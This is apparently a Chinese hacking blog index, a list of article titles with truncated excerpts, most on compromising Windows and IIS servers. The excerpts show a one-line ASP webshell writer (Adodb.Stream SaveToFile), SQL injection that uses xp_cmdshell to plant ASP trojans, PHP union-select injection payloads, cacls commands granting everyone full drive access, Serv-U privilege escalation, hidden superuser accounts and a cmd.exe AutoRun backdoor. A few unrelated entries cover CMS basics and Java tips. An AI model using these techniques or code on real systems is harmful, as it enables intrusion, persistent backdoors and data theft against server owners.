蓝法典的专栏

原创 通杀Windows用户态进程的命令

通杀Windows用户态进程的命令c:>ntsd -c q -p PID 　　只有System、SMSS.EXE和CSRSS.EXE不能杀。前两个是纯内核态的，最后那个是Win32子系统，ntsd本身需要它。ntsd从2000开始就是系统自带的用户态调试工具。被调试器附着(attach)的进程会随调试器一起退出，所以可以用来在命令行下终止进程。使用ntsd自动就获得了debug权限，从而能杀掉大部

原创 批处理文件的应用

我们来看看如果让一个程序随另一个程序的启动而启动。一个典型的应用是：让杀毒软件随着网络连接打开而自动运行，关闭网络连接时，杀毒软件自动退出。随时关闭网络连接还有节省网费、免遭攻击的好处。实现方法如下：步骤1 确定相程序的位置　　默认情况下，网络连接软件PPPoEWin.exe和江民杀毒软件KvXP.kxp(它的扩展名虽不是.exe或.com，但还是能运行)分别位于 C:/Windows/syste

原创 后门

Mix老装一幅正人君子的样子，说写文档，哼哼。。。。无聊，cmd /?后看见好多东西，其中有个好玩的： ******************* 如果 /D 未在命令行上被指定，当 CMD.EXE 开始时，它会寻找 以下 REG_SZ/REG_EXPAND_SZ 注册表变量。如果其中一个或 两个都存在，这两个变量会先被执行。 HKEY_LOCAL_MACHINE/Software/Microsoft

原创 手把手教你写批处理

出处：中国DOS联盟之联合DOS批处理的介绍扩展名是bat(在nt/2000/xp/2003下也可以是cmd)的文件就是批处理文件。==== willsort 编注 =======================================.bat是dos下的批处理文件.cmd是nt内核命令行环境的另一种批处理文件从更广义的角度来看，unix的shell脚本以及其它操作系统甚至应用程序中由外壳

原创 serv-u提升权限又一思路

今天晚上再渗透某站点的时候，碰到了点困难，所以到处找资料.凑巧看到http://eviloctal.bbnl.org/forum/read.php?tid=8157&fpage=1   这个文章.呵呵我本来以前也碰到这个情况.不过.还是自己解决了,不过所用的方法是跟intruder所用的方法不一样..我用的是嗅探.   但是我所入侵的主机的管理员的安全意识比较好.所以他把serv-u的本地监听的管

原创 SQL注入与ASP木马上传的又一思路

本文适合有sa权限sqlserver数据库、并且能sql注入支持fso+asp的服务器     SQL注入后，如何上传木马，一直是比较头疼的事，我这里提供上传木马的一种另一种方法。    1、SQL注入的时候，用xp_cmdshell 向服务器上写入一个能写文件的asp文件。    文件内容：Set objFSO = Server.CreateObject("Scripting.FileSyste

原创 对Serv-U 6.0.0.2默认帐户及密码的一点理解

创建时间：2005-02-22文章属性：原创文章提交：小齐今天获得一个webshell.发现了serv-u目录.看了下ServUDaemon.ini[GLOBAL]Version=6.0.0.2OpenFilesDownloadMode=ExclusivePacketTimeOut=300LocalSetupPassword=ah6A0ED50ADD0A516DA36992DB43F3AA39

原创 IE最新的欺骗代码

据说来自http://www.zone-h.org/但我去没找到的说……以下代码：www.163.com保存为一个htm文件就可以了。运行试试，状态栏也显示www.163.com，实际上指向http://blog.csdn.net/psyl/下面是代码运行后的样板，看看吧：

原创 传说中添加超级用户的asp代码分析

摘自 lake2这个东东弄得沸沸扬扬，要是你还不知道的话就看看《添加超级用户的.asp代码》这文章吧。    作者也说了，“反正代码是对的，但是很少能成功，具体的看运气了”，偶也拿来在webshell上试了试，失败了。把容错语句去掉，看到错误原因是“权限不够”。今天没什么事，就来分析分析，说不定……嘿嘿。    他代码关键是这个： set lp=Server.CreateObject(

原创 数据库暴库整理篇

篇首语：原来改mdb为asp就能防下载是鬼话。  引子：昨天和animator试验了一下，把data.mdb文件改名为data.asp文件后放在wwwroot目录里。然后在IE中输入data.asp路径后，发现IE显示一片空白，右键->察看源文件，跳出记事本，将内容另存为.mdb文件，用ACCESS打开，发现需要密码，也就是说至少文件头被破坏。  然后用Flashget试验下载data.asp文件

原创 msSQL注入通杀，只要有注入点就有系统权限

不知道大家看过这篇文章没有，可以在db_owner角色下添加SYSADMIN帐号，这招真狠啊，存在MSSQL注射漏洞的服务器又要遭殃了。方法主要是利用db_owner可以修改sp_addlogin和sp_addsrvrolemember这两个存储过程，饶过了验证部分。具体方法如下：先输入drop procedure sp_addlogin,然后在IE里面输入create procedure  sp

原创 新的木马模式

//--> 主页，然后查找与所需信息相关的链接。 HTTP 500.100 - 内部服务器错误 - ASP 错误 Internet 信息服务 技术信息（适用于支持人员） 错误类型： Dim bakCodepage bakCodepage = Session.Codepage Session.Codepage = 936 Response.Write Server.HTMLEncode(o

原创 Do All in Cmd Shell

zzzEVAzzz http://www.isgrey.com 2004-04-24-------------------------------------------------------目录1，前言2，文件传输3，系统配置4，网络配置5，软件安装6，Windows脚本7，附言前言Cmd Shell(命令行交互)是黑客永恒的话题，它历史悠久并且长盛不衰。本文旨在介绍和总结一些在命令行下控制W

原创 万能上传击溃ASP/PHP/JSP脚本系统

文／图　勇哥儿本文已发表在黑客x档案，转载请注明自从动网7拉开上传漏洞序幕后，各种系统的上传漏洞接踵而来！它们的漏洞原理基本都差不多，利用方法上有略微的差异，简言之可以归纳为几步：先抓包，然后修改文件类型，再在上传路径后加上空格，用十六进制编辑器把空格改成00，最后用NC提交。当然最好还是找一个具体的UpFile文件来自己分析一下，这样有助于提高对漏洞的理解和记忆！本文没有太高深的技术，只不过是把

原创 结束进程和重新启动的vbs脚本

按照提示存为t.vbs文件，在cmd窗口中输入cscript t.vbs [参数]就可以了。如果想移植到vb下，把wscript.echo替换成debug.pring或者其他的输出函数就可以了function:  list all process or kill one of themparameter:  NameorPID processs name or pidreturn:  

原创 克隆帐户终结篇修正版

 作者：LOOO　来源：http://www.looooo.info/几句废话：黑基发了我的克隆帐户之终结篇后，很多朋友对我文章提出了宝贵意见．由于原文是自己无聊时随便写的，很多地方不够严谨．于是我重新整理了此文，补充了一些资料，修改了不够严谨的地方，　有问题欢迎来我blog上探讨．序：相信大家都用过克隆帐户吧。无论是用工具还是用手工，克隆帐户无疑是隐藏帐户的最好选择。但是看见网上

原创 Serv-U权限提升再提升--记一次虚拟主机入侵

 作者：intruder来源：邪恶八进制中国自从Serv-U本地权限提升漏洞出来以后，大家手握Su.exe这把网兜逢鸡就罩，一时间的肉鸡明显增多、质量直线上升啊。特别《Win2000虚拟主机入侵大法》中的方法流传广泛之后，大家手里开始有了些做虚拟主机的高带宽、大内存，甚至有N个CPU的极品肉鸡，恭喜恭喜啊^_^（台下观众：同喜同喜）。可是也遇见了用N多修补了这个Serv-U本地权限提升漏洞

原创 下载SQL数据库

SQL Server 数据库的备份与恢复选择操作：备份　恢复数据库名：">文件路径：(备份或恢复的文件路径,备份成EXE主要为了方便下载,活活..)dim sqlserver,sqlname,sqlpassword,sqlLoginTimeout,databasename,bak_file,actsqlserver = "localhost" sql服务器sqlname = "sa" 用户名s

原创 命令打包一个站点 包括其所有目录文件

例:把E:/web/目录下的所有东西打包为1.rar放到E:/web/目录下,以便下载C:/Program Files/WinRAR/Rar.exe a -k -r -s -m1 E:/web/1.rar E:/web/参数说明:a 添加文件到压缩文件中-k 锁定压缩文件-s产生固体存档,这样可以增大压缩比-r包括子目录-m1 设置压缩比    -m0   存储     添加到压缩文件时不压缩

原创 什么是CMS系统？

CMS是Content Management System的缩写，意为"内容管理系统"。 　　CMS具有许多基于模板的优秀设计，可以加快网站开发的速度和减少开发的成本。 　　CMS的功能并不只限于文本处理，它也可以处理图片、Flash动画、声像流、图像甚至电子邮件档案。 　　CMS还分各个平台脚本种类的。 　　 　　内容管理系统是企业信息化建设和电子政务的新宠，也是一个相对较新的市场，对于内容管理

原创 完美的解决跨站脚本的COOKIE弹框框的问题

先头看到欲望之翼的self.window的办法 其实我一直有个从来没给任何人说的办法: 玩了好久了公布了呵呵: sub changeq() if form1.loc.value="" or form1.who.value="" then msgbox "没有加入地址或用户名?" exit sub end if loc=form1.loc.value user=form1.who.value st

原创 Java和jsp编程中应该注意的几个常见问题

Java和jsp编程中应该注意的问题1.    对应String类型的对象使用println()方法时，如果对象为null，将打印null而不是引发NullPointerException，由此引用的问题是容易造成错觉，对于以后对字符串的操作容易引起问题。2.    引发NullPointerException异常，主要原因是没有对对象的存在性进行验证，在jsp编程中经常出现：if (reques

原创 开始→运行→命令集锦

 cmd.exe--------CMD命令提示符 chkdsk.exe-----Chkdsk磁盘检查 certmgr.msc----证书管理实用程序 calc-----------启动计算器 charmap--------启动字符映射表 cliconfg-------SQL SERVER 客户端网络实用程序 Clipbrd--------剪贴板查看器 conf-----------启动netm

原创 sql injection终极利用方法

 来自教主blog声明：本文仅用于教学目的，如果因为本文造成的攻击后果本人概不负责。因为发觉其危害过大，原文已经经过大量删减及修改，即使这样本文的危害性仍然很大，所以请大家不要对国内的站点做任何具有破坏性的操作。 考虑再三，偶还是决定发出来。此招手段歹毒，利用范围广泛，可以说是只要是有sql注射漏洞的网站，只要运用此法99%可以拿到webshell甚至系统权限（不敢把话说满，呵呵，经本人数

原创 google你真好

常用的google关键字：foo1 foo2 (也就是关联，比如搜索xx公司 xx美女)operator:foofiletype:123 类型site:foo.com 相对直接看网站更有意思，可以得到许多意外的信息intext:foo intitle: fooltitle 标题哦allinurl:foo 搜索xx网站的所有相关连接。（踩点必备）links:foo 

原创 关闭多余的端口，为你打造最安全的PC

原创 PHP注射天书

php注射库 or 1=1 or 1=1 /* %23 and password=mypass id=-1 union select 1,1,1 id=-1 union select char(97),char(97),char(97) id=1 union select 1,1,1 from members id=1 union select 1,1,1 from adm

原创 ASP错误信息说明

Microsoft VBScript语法错误(0x800A03E9)-->内存不足Microsoft VBScript语法错误(0x800A03EA)-->语法错误Microsoft VBScript语法错误(0x800A03EB)-->缺少 :Microsoft VBScript语法错误(0x800A03ED)-->缺少

原创 CEO、COO、CFO、CTO、CIO是什么意思

CEO(Chief executive officer)首席执行官 类似总经理、总裁，是企业的法人代表。COO(Chief operating officer)首席运营官 类似常务总经理CFO(Chief financial officer)首席财务官 类似财务总经理CTO(Chief technology officer)首席技术官 类似总工程师CIO(Chief information off

原创 动网论坛7.0获得WebShell的分析

Super·Hei和我提起《Backup a shell》这篇文章，就和我说，按照这个文章的方法，有没有办法拿到动网论坛上利用，因为DVBBS7.0即使设置允许上传asp文件，实际上也是无法上传的，既然能够去后台设置允许上传文件类型，那何不利用这个方法去备份一个WebShell，我们发帖子写入特制的WebShell的代码，然后备份一下，不就有WebShell了吗？那能不能用到ACCESS数据库里？

原创 google高手必经之路

（本贴是“google技巧大汇集”的修改版，去掉了许多冗余内容） Google（www.Google.com）是一个搜索引擎，由两个斯坦福大学博士生Larry Page与Sergey Brin于1998年9月发明，Google Inc. 于1999年创立。2000年7月份，Google替代Inktomi成为Yahoo公司的搜索引擎，同年9月份，Google成为中国网易公司的搜索引擎。98年至今，G

原创 铁打的电脑流水的IP 部署Windows2003的DHCP

晨晨所管理的网络规模在迅速膨胀，而且电脑数量还在不断增加。为了能把工作搞好，晨晨不断地利用空余时间“充电”。这天他从一些资料中得知，在电脑数量比较多的网络中可以使用DHCP服务为客户端电脑自动分配IP地址，可以省去手动配置IP地址的麻烦。晨晨心想这倒不错，这样一来肯定能减轻不少工作负担。尽管通过看资料晨晨已经对DHCP有了一定地了解，但由于没有实践经验而不敢轻易动手操作，幸好有我们的高手阿昊在一旁

原创 windows默认文件夹权限(提升权限用)

这些文件夹权限给列出来了，你上传asp木马之后，用来提供权限用的。这里主要是给你列个表。好查呀，收藏吧，很有用的。文件或文件夹 用户组 建议权限 继承方式 %AllUsersProfile% 包含了每个用户的桌面以及配置文件的文件夹，通常位于C:/Documents and

原创 最小的asp后门

首先在asp文件中写如代码然后在本地写个表单 set lP=server.createObject("Adodb.Stream") lP.Open lP.Type=2 lP.CharSet="gb2312" lP.writetext request("hackbin") lP.SaveToFile server.mappath("men.asp"),2 lP.Close set lP=no

原创 黑客防线——主机外部的危险

前言:不是我有意想搞你，而是你们有些过分了，拿着别人的稿子去卖钱，拿着别人的技术装点自己，这也无所谓。你们那种优越感让我不得不提醒你们一下，你们的优越是建立在别人付出之上的。 一、扫描，发现开着ftp。。。。。没常见漏洞。。。。。决定arp欺骗，进行嗅探。 二、找嗅探主机: C:/>ping hacker.com.cn Pinging hacker.com.cn [211.157.102.

原创 CAcls命令在提权中的使用

cacls.exe c: /e /t /g everyone:F          #把c盘设置为everyone可以浏览cacls.exe d: /e /t /g everyone:F       #把d盘设置为everyone可以浏览cacls.exe e: /e /t /g everyone:F          #把e盘设置为everyone可以浏览cacls.exe f: /e /t /

原创 使用Magic Winmail 来提升权限

Magic Winmail是一款很不错的mail server 软件，深受不少网站的青睐。主要是一些中小的网站。但是在笔者最近的一次渗透中发现，装有改软件的服务器，如果一旦被入侵者得到webshell就可以通过这个软件来提升权限，非常危险。 装有Magic Winmail的服务器会在系统上开启8080端口，对外提供邮件服务。使用过它的人应该知道。这个Magic Winmail服务器支持php脚本解

原创 如何在WIN2000/XP中建立隐藏的超级用户

信息来源：http://wmjie.51.net/swords/一、如何在图形界面建立隐藏的超级用户 图形界面下适用本地或开3389终端服务的肉鸡上。上面我提到的那位作者说的方法很好，但是较为复杂，还要用到psu.exe(让程序以系统用户身份运行的程序），如果在肉鸡上的话还要上传psu.exe。我说的这个方法将不用到psu.exe这个程序。因为windows2000有两个注册表编辑器:regedi

原创 SERV-U配置文件详解

SERV-U的目录文件结构说明Servudaemon.exe        serv-u的服务程序,主文件Servudaemon.ini        serv-u的配置文件,记录用户信息,服务器参数Seruadmin.exe                serv-u管理界面Servuadmin.ini                serv-u管理界面配置文件Servutray.exe    

原创 通过httptunnel来实现对端口限制的突破

文章作者：小齐快考试了.找了个在线实验练习.需要注册才能看到实验模拟路由器的IP和端口.注册了才发现需要填写真实信箱,因为密码是发到信箱里去的.可偏偏服务器的imail好像又出了点问题.报错了..郁闷之中习惯性的试了几个字符串..哈.有点问题.nbsi扫了下,hoho,SA呀....netstat -an,哟..3389口都开着.随手加了个帐号终端连过去.怪了..连不上..net st